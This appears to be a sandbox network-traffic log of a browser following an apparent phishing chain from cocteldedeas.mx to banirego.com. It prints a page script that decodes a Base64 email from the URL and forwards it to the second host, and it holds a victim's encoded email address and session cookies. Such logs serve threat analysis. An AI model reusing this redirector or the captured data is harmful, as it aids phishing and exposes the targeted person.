                                                                              Connection: keep-alive
                                                                              Cache-Control: max-age=0
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Upgrade-Insecure-Requests: 1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                              Sec-Fetch-Site: same-origin
                                                                              Sec-Fetch-Mode: navigate
                                                                              Sec-Fetch-Dest: document
                                                                              Referer: https://cocteldedeas.mx/rx567
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Cookie: -MRy1K2L2S2CnLEnrK9gU-VA9Ug=PskXfhJgru4qytMiKv068Q0xn-w; dlfFL1oUMLcOCnZI9Pr-CABRls4=1736541693; rnl56SFtG5TOo5DuwAMsjNJSgg4=1736628093; z7UG9wyEGxZKaKLkBT5htPzLjNI=8Jez4lB_IBbHDqZbQy6Fvn_EVBQ; Pp5f-cdR2ovPa-rlnOI2llLcQL0=24V5fd_SqGfynCsHmAJbl9ySndA; 8DQ6bV-yBfaqqQlKL56scO8tC2Q=1736541698; g4H-foKykfHJJhggqIe6T1TUqbg=1736628098; xMXu8kMhP2nWgiPnkh-v3z0m_pw=HwrWEDPJFMBTmFswmSpWLtgcorE
                                                                              2025-01-10 20:41:39 UTC1048INHTTP/1.1 301 Moved Permanently
                                                                              Date: Fri, 10 Jan 2025 20:41:39 GMT
                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              X-Content-Type-Options: nosniff
                                                                              X-Content-Type-Options: nosniff
                                                                              X-XSS-Protection: 1; mode=block
                                                                              X-XSS-Protection: 1; mode=block
                                                                              Location: http://cocteldedeas.mx/rx567/
                                                                              X-Nginx-Upstream-Cache-Status: MISS
                                                                              X-Server-Powered-By: Engintron
                                                                              cf-cache-status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VYgAv0QAAOqGmxdW14ozzzIkOwfrBJsx2IMJBggIIGyvu76FXYHynWvjdXrTP3ELuwTnGNGVnOr%2BMpCVMyON8dMBjywcB62MPomk3zYDtljCQ6npwUNOnEsE1bS5MI2lEiY%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8fff7d346c9f421c-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=13425&min_rtt=2214&rtt_var=7679&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1690&delivery_rate=1318879&cwnd=252&unsent_bytes=0&cid=824c076c87ba8211&ts=584&x=0"
                                                                              2025-01-10 20:41:39 UTC244INData Raw: 65 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 63 74 65 6c 64 65 64 65 61 73 2e 6d 78 2f 72 78 35 36 37 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                              Data Ascii: ee<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://cocteldedeas.mx/rx567/">here</a>.</p></body></html>
                                                                              2025-01-10 20:41:39 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              4192.168.2.54972435.190.80.14432848C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-10 20:41:39 UTC482OUTPOST /report/v4?s=VlafJHtsUmyUp7L1Yu7FSOtYQDJZsG3y6b%2BKYn9%2BmAvXbl3d0eoy8UEerLi7lDT4s1%2F%2BJQw9Hdoyl4tCx5CQ%2FfMX4VIzqs51C0063lOkAJCKFGlPgkzneMluKrBUVKPqJ2Q%3D HTTP/1.1
                                                                              Host: a.nel.cloudflare.com
                                                                              Connection: keep-alive
                                                                              Content-Length: 390
                                                                              Content-Type: application/reports+json
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2025-01-10 20:41:39 UTC390OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 31 34 34 36 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 38 38 2e 31 31 34 2e 39 37 2e 33 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 35 30 33 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 63 6f 63 74 65 6c 64 65 64 65 61 73 2e 6d 78 2f
                                                                              Data Ascii: [{"age":0,"body":{"elapsed_time":1446,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"","sampling_fraction":1.0,"server_ip":"188.114.97.3","status_code":503,"type":"http.error"},"type":"network-error","url":"https://cocteldedeas.mx/
                                                                              2025-01-10 20:41:39 UTC168INHTTP/1.1 200 OK
                                                                              Content-Length: 0
                                                                              date: Fri, 10 Jan 2025 20:41:39 GMT
                                                                              Via: 1.1 google
                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                              Connection: close


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              5192.168.2.549725188.114.97.34432848C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-10 20:41:39 UTC785OUTGET /cdn-cgi/challenge-platform/scripts/jsd/main.js HTTP/1.1
                                                                              Host: cocteldedeas.mx
                                                                              Connection: keep-alive
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: same-origin
                                                                              Sec-Fetch-Mode: no-cors
                                                                              Sec-Fetch-Dest: script
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Cookie: -MRy1K2L2S2CnLEnrK9gU-VA9Ug=PskXfhJgru4qytMiKv068Q0xn-w; dlfFL1oUMLcOCnZI9Pr-CABRls4=1736541693; rnl56SFtG5TOo5DuwAMsjNJSgg4=1736628093; z7UG9wyEGxZKaKLkBT5htPzLjNI=8Jez4lB_IBbHDqZbQy6Fvn_EVBQ; Pp5f-cdR2ovPa-rlnOI2llLcQL0=24V5fd_SqGfynCsHmAJbl9ySndA
                                                                              2025-01-10 20:41:39 UTC915INHTTP/1.1 302 Found
                                                                              Date: Fri, 10 Jan 2025 20:41:39 GMT
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              location: /cdn-cgi/challenge-platform/h/b/scripts/jsd/e0c90b6a3ed1/main.js?
                                                                              cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=10800, public
                                                                              access-control-allow-origin: *
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vgQdERK40edLf7U0pj%2BYCRhXIjNeoQVIV3cp%2Ft8Lj7HBfqyrYVQYk02M3Y4Pnt7eU%2BtQygVkG9JlzVOk%2BX4FOnpplwbx9HqasLuFpp00uF4NFH13e7YC5Dvxo4jzepit2o8%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8fff7d36af944345-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=4433&min_rtt=4433&rtt_var=2216&sent=6&recv=7&lost=0&retrans=1&sent_bytes=4218&recv_bytes=1363&delivery_rate=147177&cwnd=219&unsent_bytes=0&cid=a10c1533a808daa4&ts=181&x=0"


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              6192.168.2.549728188.114.97.34432848C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-10 20:41:40 UTC1072OUTGET /rx567/ HTTP/1.1
                                                                              Host: cocteldedeas.mx
                                                                              Connection: keep-alive
                                                                              Cache-Control: max-age=0
                                                                              Upgrade-Insecure-Requests: 1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                              Sec-Fetch-Site: cross-site
                                                                              Sec-Fetch-Mode: navigate
                                                                              Sec-Fetch-Dest: document
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Cookie: -MRy1K2L2S2CnLEnrK9gU-VA9Ug=PskXfhJgru4qytMiKv068Q0xn-w; dlfFL1oUMLcOCnZI9Pr-CABRls4=1736541693; rnl56SFtG5TOo5DuwAMsjNJSgg4=1736628093; z7UG9wyEGxZKaKLkBT5htPzLjNI=8Jez4lB_IBbHDqZbQy6Fvn_EVBQ; Pp5f-cdR2ovPa-rlnOI2llLcQL0=24V5fd_SqGfynCsHmAJbl9ySndA; 8DQ6bV-yBfaqqQlKL56scO8tC2Q=1736541698; g4H-foKykfHJJhggqIe6T1TUqbg=1736628098; xMXu8kMhP2nWgiPnkh-v3z0m_pw=HwrWEDPJFMBTmFswmSpWLtgcorE
                                                                              2025-01-10 20:41:40 UTC1042INHTTP/1.1 200 OK
                                                                              Date: Fri, 10 Jan 2025 20:41:40 GMT
                                                                              Content-Type: text/html
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Vary: Accept-Encoding
                                                                              X-Content-Type-Options: nosniff
                                                                              X-Content-Type-Options: nosniff
                                                                              X-XSS-Protection: 1; mode=block
                                                                              X-XSS-Protection: 1; mode=block
                                                                              Last-Modified: Fri, 10 Jan 2025 12:16:43 GMT
                                                                              X-Nginx-Upstream-Cache-Status: EXPIRED
                                                                              X-Server-Powered-By: Engintron
                                                                              cf-cache-status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B%2FYcNZJwfzROsmLaMejRP4nQWP26V75ofSPtiNrNpKr21uiSGzRhf1ymCXUajHfcz0jDdTANkGMcntPEtf8DSKxfdKjGAOqQKHGjIrAtyQrqrYdrRioxHZIwvAG2ZtcEcCg%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8fff7d3d6c984259-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1764&min_rtt=1763&rtt_var=664&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1650&delivery_rate=1645070&cwnd=235&unsent_bytes=0&cid=b5a710d16dca7891&ts=264&x=0"
                                                                              2025-01-10 20:41:40 UTC327INData Raw: 39 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 48 52 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 2f 2f 20 46 75 6e 63 74 69 6f 6e 20 74 6f 20 64 65 63 6f 64 65 20 42 61 73 65 36 34 20 61 6e 64 20 72 65 64 69 72 65 63 74 0a 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 72 65
                                                                              Data Ascii: 926<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>HR</title></head><body><script> // Function to decode Base64 and redirect function re
                                                                              2025-01-10 20:41:40 UTC1369INData Raw: 20 63 75 72 72 65 6e 74 20 55 52 4c 0a 20 20 20 20 20 20 20 20 63 6f 6e 73 74 20 68 61 73 68 49 6e 64 65 78 20 3d 20 75 72 6c 2e 69 6e 64 65 78 4f 66 28 27 23 27 29 3b 20 2f 2f 20 46 69 6e 64 20 74 68 65 20 69 6e 64 65 78 20 6f 66 20 74 68 65 20 68 61 73 68 0a 0a 20 20 20 20 20 20 20 20 2f 2f 20 43 68 65 63 6b 20 69 66 20 74 68 65 72 65 20 69 73 20 61 20 68 61 73 68 20 69 6e 20 74 68 65 20 55 52 4c 0a 20 20 20 20 20 20 20 20 69 66 20 28 68 61 73 68 49 6e 64 65 78 20 21 3d 3d 20 2d 31 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e 73 74 20 65 6e 63 6f 64 65 64 45 6d 61 69 6c 20 3d 20 75 72 6c 2e 73 75 62 73 74 72 69 6e 67 28 68 61 73 68 49 6e 64 65 78 20 2b 20 31 29 3b 20 2f 2f 20 47 65 74 20 74 68 65 20 42 61 73 65 36 34 20 73 74 72 69 6e 67 20
                                                                              Data Ascii: current URL const hashIndex = url.indexOf('#'); // Find the index of the hash // Check if there is a hash in the URL if (hashIndex !== -1) { const encodedEmail = url.substring(hashIndex + 1); // Get the Base64 string
                                                                              2025-01-10 20:41:40 UTC653INData Raw: 64 2f 6d 61 69 6e 2e 6a 73 27 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 27 68 65 61 64 27 29 5b 30 5d 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 22 3b 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 27 68 65 61 64 27 29 5b 30 5d 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 64 29 7d 7d 69 66 28 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 29 7b 76 61 72 20 61 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 69 66 72 61 6d 65 27 29 3b 61 2e 68 65 69 67 68 74 3d 31 3b 61 2e 77 69 64 74 68 3d 31 3b 61 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 3b 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 30 3b 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 30 3b 61
                                                                              Data Ascii: d/main.js';document.getElementsByTagName('head')[0].appendChild(a);";b.getElementsByTagName('head')[0].appendChild(d)}}if(document.body){var a=document.createElement('iframe');a.height=1;a.width=1;a.style.position='absolute';a.style.top=0;a.style.left=0;a
                                                                              2025-01-10 20:41:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              7192.168.2.549731207.174.40.1824432848C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-10 20:41:41 UTC724OUTGET /?uxkvuxjb&email=cmVjaWJhc2VAc2VhbWFyaXRpbWEuY29t HTTP/1.1
                                                                              Host: banirego.com
                                                                              Connection: keep-alive
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Upgrade-Insecure-Requests: 1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                              Sec-Fetch-Site: cross-site
                                                                              Sec-Fetch-Mode: navigate
                                                                              Sec-Fetch-Dest: document
                                                                              Referer: https://cocteldedeas.mx/
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2025-01-10 20:41:41 UTC459INHTTP/1.1 302 Found
                                                                              Set-Cookie: qPdM=mizFm7lvi4Ix; path=/; samesite=none; secure; httponly
                                                                              Set-Cookie: qPdM.sig=c7fMZa64FGu4IHTMDws8A8hsMMg; path=/; samesite=none; secure; httponly
                                                                              location: /?uxkvuxjb=057408803a71a0ac4c22a04edd01551738a72ec043824bc1c0ccbb193634608407dbb3325f3c113b575f21696ea25abad7a5ce19d99eebf2f5c0709d8da49030&email=cmVjaWJhc2VAc2VhbWFyaXRpbWEuY29t
                                                                              Date: Fri, 10 Jan 2025 20:41:41 GMT
                                                                              Connection: close
                                                                              Transfer-Encoding: chunked
                                                                              2025-01-10 20:41:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              8192.168.2.549732207.174.40.1824432848C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-10 20:41:41 UTC918OUTGET /?uxkvuxjb=057408803a71a0ac4c22a04edd01551738a72ec043824bc1c0ccbb193634608407dbb3325f3c113b575f21696ea25abad7a5ce19d99eebf2f5c0709d8da49030&email=cmVjaWJhc2VAc2VhbWFyaXRpbWEuY29t HTTP/1.1
                                                                              Host: banirego.com
                                                                              Connection: keep-alive
                                                                              Upgrade-Insecure-Requests: 1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                              Sec-Fetch-Site: cross-site
                                                                              Sec-Fetch-Mode: navigate
                                                                              Sec-Fetch-Dest: document
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Referer: https://cocteldedeas.mx/
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Cookie: qPdM=mizFm7lvi4Ix; qPdM.sig=c7fMZa64FGu4IHTMDws8A8hsMMg
                                                                              2025-01-10 20:41:41 UTC142INHTTP/1.1 200 OK
                                                                              Content-Type: text/html;charset=UTF-8
                                                                              Date: Fri, 10 Jan 2025 20:41:41 GMT
                                                                              Connection: close
                                                                              Transfer-Encoding: chunked
                                                                              2025-01-10 20:41:41 UTC3272INData Raw: 63 62 63 0d 0a 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 2d 55 53 3e 3c 68 65 61 64 3e 20 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 64 65 66 65 72 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 74 75 72 6e 73 74 69 6c 65 2f 76 30 2f 61 70 69 2e 6a 73 3f 6f 6e 6c 6f 61 64 3d 6f 6e 6c 6f 61 64 54 75 72 6e 73 74 69 6c 65 43 61 6c 6c 62 61 63 6b 22 3e 0a 3c 2f 73 63 72 69 70 74 3e 20 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d
                                                                              Data Ascii: cbc<!doctype html><html lang=en-US><head> <script async defer src="https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallback"></script> <title>Just a moment...</title> <meta content="width=device-width,initial-scale=1" name=


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              9192.168.2.549733104.18.95.414432848C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-10 20:41:42 UTC571OUTGET /turnstile/v0/api.js?onload=onloadTurnstileCallback HTTP/1.1
                                                                              Host: challenges.cloudflare.com
                                                                              Connection: keep-alive
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: cross-site
                                                                              Sec-Fetch-Mode: no-cors
                                                                              Sec-Fetch-Dest: script
                                                                              Referer: https://banirego.com/
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2025-01-10 20:41:42 UTC386INHTTP/1.1 302 Found
                                                                              Date: Fri, 10 Jan 2025 20:41:42 GMT
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              access-control-allow-origin: *
                                                                              cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=300, public
                                                                              cross-origin-resource-policy: cross-origin
                                                                              location: /turnstile/v0/b/e0c90b6a3ed1/api.js
                                                                              Server: cloudflare
                                                                              CF-RAY: 8fff7d48fb0dc3ff-EWR
                                                                              alt-svc: h3=":443"; ma=86400


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              10192.168.2.549735104.18.95.414432848C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-10 20:41:43 UTC555OUTGET /turnstile/v0/b/e0c90b6a3ed1/api.js HTTP/1.1
                                                                              Host: challenges.cloudflare.com
                                                                              Connection: keep-alive
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: cross-site
                                                                              Sec-Fetch-Mode: no-cors
                                                                              Sec-Fetch-Dest: script
                                                                              Referer: https://banirego.com/
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2025-01-10 20:41:43 UTC471INHTTP/1.1 200 OK
                                                                              Date: Fri, 10 Jan 2025 20:41:43 GMT
                                                                              Content-Type: application/javascript; charset=UTF-8
                                                                              Content-Length: 47521
                                                                              Connection: close
                                                                              accept-ranges: bytes
                                                                              last-modified: Wed, 08 Jan 2025 13:42:47 GMT
                                                                              cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                              access-control-allow-origin: *
                                                                              cross-origin-resource-policy: cross-origin
                                                                              Server: cloudflare
                                                                              CF-RAY: 8fff7d4d3c868c96-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              2025-01-10 20:41:43 UTC1369INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 57 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                                              Data Ascii: "use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
                                                                              2025-01-10 20:41:43 UTC1369INData Raw: 74 28 65 29 7b 69 66 28 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 65 29 29 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 6a 74 28 65 2c 72 29 7b 76 61 72 20 6e 3d 65 3d 3d 6e 75 6c 6c 3f 6e 75 6c 6c 3a 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 7c 7c 65 5b 22 40 40 69 74 65 72 61 74 6f 72 22 5d 3b 69 66 28 6e 21 3d 6e 75 6c 6c 29 7b 76 61 72 20 6f 3d 5b 5d 2c 63 3d 21 30 2c 75 3d 21 31 2c 67 2c 68 3b 74 72 79 7b 66 6f 72 28 6e 3d 6e 2e 63 61 6c 6c 28 65 29 3b 21 28 63 3d 28 67 3d 6e 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 29 26 26 28 6f 2e 70 75 73 68 28 67 2e 76 61 6c 75 65 29 2c 21 28 72 26 26 6f 2e 6c 65 6e 67 74 68 3d 3d 3d 72 29 29 3b 63 3d 21 30 29
                                                                              Data Ascii: t(e){if(Array.isArray(e))return e}function jt(e,r){var n=e==null?null:typeof Symbol!="undefined"&&e[Symbol.iterator]||e["@@iterator"];if(n!=null){var o=[],c=!0,u=!1,g,h;try{for(n=n.call(e);!(c=(g=n.next()).done)&&(o.push(g.value),!(r&&o.length===r));c=!0)
